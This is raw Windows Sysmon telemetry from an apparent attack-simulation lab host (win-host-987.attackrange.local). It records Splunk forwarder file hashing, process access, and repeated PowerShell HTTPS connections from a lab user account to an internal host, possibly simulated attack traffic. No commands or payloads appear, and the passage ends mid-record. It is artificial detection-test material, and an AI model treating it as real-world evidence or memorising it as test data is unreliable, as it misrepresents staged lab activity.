23542300x800000000000000035086300Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.579{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=95640EC77AF7CBE9082E34D509BF9DE2,SHA256=B3C86A22925640ED922B69B0440594D1AB5FF2A7A2D3CF20D5515DF5D3EEFA53,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086303Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:55.661{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=151EC02D01DCA4FB16EAE334C3A1C0C6,SHA256=0870834B9F0C9971642A08DF9C981CA27E76B5FF2DB461FD8B7E3D5C233FDC44,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086302Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.994{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086307Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:56.676{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=474BB37596D8C35B5BA7AE2EFCA1DCF3,SHA256=259DB183F412D45CC67B62B926CB300540A3868B55E7A4C523202AB1BFCC01C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086306Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:21.072{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56830-false10.0.1.12-8000- 354300x800000000000000035086305Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:21.003{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56829-false10.0.1.12-8089- 354300x800000000000000035086304Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:19.558{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56828-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086308Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:57.691{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95AB3A1DA1E826F066C36869279B9E14,SHA256=71FA8EF4598A0B088266F6530532C90BB02A77E17CFACADD634E76A04E5065AD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086309Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:58.707{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F827FA9FD28EAB117699BBFACB8D3225,SHA256=C54D9F124A960840637FB1EFF7F48664ACA9E6AB7075DBC628F12AD608BC5C69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086311Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:59.726{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB54A385EB7CA2699C753C9BF2A15B64,SHA256=80BBE488929364614A16176439134AC76D3B0E5EB8C10B8B9995A2811D4CE750,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086310Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:59.573{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=80E99C40031D9D8E578E3286F1EB63E0,SHA256=CB9921124F0D91E218628818B39ADB3963B5CE825513D07FD6A57D0B5DE6A13A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086313Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:00.740{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A017B83BF2F20980BABE392F118AEDF,SHA256=3CF30EE111A1B38B413D82CEB21949EB97F684BF9FEF2E75897BB5A425A37854,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086312Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:24.568{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56831-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086315Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:01.770{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=241EADA11A5137B25E19FDF359BD9DD1,SHA256=A3AE0193C3CC7B021217885D3DB4D793B9FF02A00DC3B815732397B7FC2080E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086314Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:26.114{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56832-false10.0.1.12-8000- 23542300x800000000000000035086316Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:02.785{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AE8A41033CE99E9BEB032B4DAD4370D,SHA256=6E68D41810FF2286C597FA4ADD1DB412AA388ABAA6E7A296293D8ED90D6B3856,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086317Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:03.786{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=340E3F888C0ADB5840FB345A0812608C,SHA256=8C8C3FC220D19EBD94890FB0B054134EEA1CC43F932CE3E1FB73632E1E9CB158,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086318Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:04.802{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=413BFBD2128A22B5E4D15228131B6C07,SHA256=7A06630F966CC5378E0DD9353AD1347A38E57E2A92B91BA2C55F09570239B6F7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086320Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:05.821{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33B866C84DA327006537488F58720DC7,SHA256=F86919DC47C9CE03C81B463FD65BA0290214D384232B58F1371C147ED232F6C3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086319Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:05.784{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=13279D459CA46D03F225522F560DFA2D,SHA256=6F73BC4A53D20F9A0297A441566610F3E8A6A01A1D05120BA783A65E43D3084F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086322Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:06.851{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=822F85AF8DDF758F5D034B1FDC6322D6,SHA256=8FF6BE849B31364805EF8667B4A6B369283CBB38C29BA69621A0A49476E50695,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086321Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:30.580{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56833-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086323Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:07.866{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90B603EB2725DD31E3C28F8589155F11,SHA256=29CCDCB21EF7B6A0F70EFD0659C74472DAD5012642FE455CD69DDD0CAB8670E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086325Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:32.128{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56834-false10.0.1.12-8000- 23542300x800000000000000035086324Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:08.880{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B63D29D6ACB0D81D6879F688782F73AC,SHA256=D1C68CC8C683905238FBF240B79B3C824818130C6033E0A07EEC2EF84123311C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086328Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:09.898{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=387DAE04B216517785D99CDAB7A363CD,SHA256=3399357F98CCD850C98BB9232CADF5713F6B169DAA682455045AD6F190376522,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086327Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:34.591{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56835-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086326Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:09.580{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=942123578EC59A97ABE5D0FC56E8C8C4,SHA256=37EEC7DF11B8F557983752817E85A684CAD3A264C6C23E05C17C903C3A1C9E9A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086329Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:10.916{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=914BFFCA07C67AF4D89488C3DC4EE51A,SHA256=CE5B28A6AC7393CCE248034CFEDA0AFA9E0F5474799A2B2DAAB2242D73F7B85D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086330Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:11.937{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F533DBFC2DF2E94463A80E3B98D74E1B,SHA256=5A4765048813BB255AEF41535BCC7E5A9D323AB3DE7137DF3E07E2B406639BEB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086332Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:12.951{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E678CD4ACF123CAFDA01050CB170397,SHA256=B9A41C2DD8A1AD9CEC14F41BC6DDA921132E3B3B032D6AF0FC7EB6D7CCFD6368,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086331Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:37.157{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56836-false10.0.1.12-8000- 23542300x800000000000000035086350Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.966{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49FD529CC9842323A93D76A7D0157861,SHA256=7B248A2D262E42B2138204C542121ECB4BB0F59FA24B7052F018F89E33F76EDC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086349Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.682{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-5021-613A-8890-03000000C801}1044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.682{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.682{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086346Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.682{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086345Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.682{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086344Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.682{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-5021-613A-8890-03000000C801}1044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086343Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.682{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-5021-613A-8890-03000000C801}1044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086342Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.667{B81B27B7-5021-613A-8890-03000000C801}1044C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035086341Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.220{B81B27B7-5020-613A-8790-03000000C801}29683908C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086340Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.004{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-5020-613A-8790-03000000C801}2968C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086339Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:13.003{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086338Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 